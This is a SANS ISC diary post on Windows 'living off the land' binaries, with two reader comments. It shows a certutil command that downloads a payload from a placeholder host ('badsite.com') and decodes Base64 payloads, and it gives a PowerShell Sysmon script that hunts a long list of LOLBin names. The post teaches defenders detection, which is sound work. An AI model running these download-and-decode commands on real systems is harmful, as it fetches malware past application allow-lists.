My next class:

Keep An Eye on LOLBins

Published: 2020-08-25. Last Updated: 2020-08-25 07:25:20 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

Don't misread, I won't talk about "lolcats" today but "LOLBins" or "Living Off The Land Binaries". All operating systems provide a rich toolbox to achieve multiple day-to-day tasks like maintenance of the certificates, installation of patches and applications, management of files, and many more. Those tools are installed by default and available to all users without specific access rights (most of the time). Also very important, they are signed by the operating system so they are usually considered safe by default. 

The problem is the following: These tools are very powerful and provide interesting features for attackers. They are used for malicious purposes. Why reinvent the wheel if an attacker has access to a tool to achieve a specific task? Let's have a look at some tools available in every Microsoft Windows operating system. If you're using AppLocker, they are chances that you're allowing Microsoft signed binaries in your policy. Let's review some example:

certutil.exe is a tool used to work with certificates (as the name says) but do you know it can also be used as a command-line browser to download some content from an URL:

C:\Temp> certutil.exe -urlcache -split -f "https://badsite.com/payload.exe" iambad.exe

It can also be used to quickly decode a Base64-encoded payload:

C:\Temp> certutil -decode payload.txt payload.exe

I also mentioned several times in other diaries other looks like msbuild.exe, csc.exe, or jsc.exe that are provided by the .NET Framework[1]. They are useful to compile code on the fly or to spawn other processes.

Even simple commands like ping.exe can be used in alternative ways. By example to implement a pause in a script:

C:\Temp> ping -n 5 127.0.0.1

Ping will send 5 ICMP request packets to the loopback interface, one per second. So, we introduce a pause of 5 seconds.

They are plenty of tools that could be potentially dangerous if invoked from an abnormal process (like word.exe or powershell.exe) or by a regular user. A nice list has been compiled and made available online: The LOLBAS project[2] ("Living Off The Land Binaries and Scripts (and also Libraries).

My advice is to track the usage of those tools via Sysmon and Powershell. Here is an example of a quick script to extract interesting Sysmon events: (credits to leoloobeek[3]):

$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdeploy.exe","msxsl.exe","rcsi.exe","Sqldumper.exe","Sqlps.exe","SQLToolsPS.exe","te.exe","Tracker.exe","vsjitdebugger.exe")

Foreach($lolbin in $lolbins)
{
    Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=1;} | ?{ $_.message -match "`r`nImage: .*$lolbin`r`n" } | %{
        [regex]$regex = "(?i)`r`n(?<image>Image: .*$lolbin)`r`n(?<args>CommandLine: .*)`r`n"
        $match = $regex.Match($_.message)

        $Out = New-Object PSObject
        $Out | Add-Member Noteproperty 'Binary' $lolbin
        $Out | Add-Member Noteproperty 'Image' $match.Groups["image"].value
        $Out | Add-Member Noteproperty 'Args' $match.Groups["args"].value
        $Out | fl
    }
}

It's easy to find existing Sysmon configurations that already take LOLBins into account[4]. 

Stay safe and keep an eye on those tools!

[1] https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278
[2] https://lolbas-project.github.io
[3] https://gist.github.com/leoloobeek/a3a4d9af3bf7fb37b6d82a7a17e7176d
[4] https://raw.githubusercontent.com/ion-storm/sysmon-config/master/sysmonconfig-export.xml

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

2 comment(s)
My next class:

Comments

I have noticed that these are getting more and more popular with CTF creators as I see them more often on hackthebox. Good post!
Hi,

Lovely article on this topic! I immediately tried this myself but upon execution of the script I noticed the arguments and Image is not being displayed. is this a known error or am I doing something wrong. also I would like to extent the functionality to include also the user who started the process.
I love to hear back from you!

Thanks in Advance!
Pieter
Security Engineer for Lineas

Diary Archives